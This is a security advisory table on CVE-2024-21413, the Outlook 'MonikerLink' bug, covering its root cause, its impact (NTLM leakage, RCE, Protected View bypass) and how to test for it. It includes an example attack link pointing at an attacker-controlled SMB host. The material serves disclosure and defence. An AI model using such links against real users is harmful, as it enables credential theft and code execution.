CVE-2024-21413 | Outlook | RCE
| Vulnerability | CVE-2024-21413 |
|---|---|
| Type | Remote code execution “RCE” |
| Description | A significant security vulnerability discovered in Microsoft Outlook with a CVSS of 9.8. Termed the MonikerLink bug, this vulnerability has far-reaching implications, including the potential leakage of local NTLM information and the possibility of remote code execution. Moreover, successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode, thereby extending its threat to other Office applications. Root cause MonikerLink bug (or attack vector) is a security risk introduced by using an unsafe API (the MkParseDisplayName/MkParseDisplayNameEx). Therefore, this security issue may not only exist in Microsoft Outlook, but it may also exist in and affect other software that uses the APIs in an insecure way. It’s something like the log4j bug affecting the Java ecosystem, but this MonikerLink bug/attack vector affects the Windows/COM ecosystem. |
| The Impact of the Bug | - Leaking the local NTLM credential information The attempt to access the remote “test.rtf” would use the SMB protocol (port 445), and it would leak the local NTLM credential information during the process. - From new attack vector to arbitrary code execution When the user clicks on a link like “file://\10.10.111.111\test\test.rtf\something” Outlook treats the link as a “Moniker Link”, a “Moniker Link” string means the caller will use the string to “look up” for COM objects, Outlook calls the “ole32!MkParseDisplayName()” API to do that job – parsing the Moniker Link string and using that to “look up” for COM objects and word opens and parses the “test.rtf” file – which is on the attacker-controlled server and controlled by the attacker which could lead to remote code execution. |
| How to detect if you have a vulnerable application to this attack vector? | Use the Hyperlink following the format “file://\IP\test\test.rtf\something” somewhere into the input that the target software “the software that may uses the MkParseDisplayName/MkParseDisplayNameEx APIs in a vulnerable way”, the program will process it. Then monitor the behaviors of the target software when it processes the input. |
| References | https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413 https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/ https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability |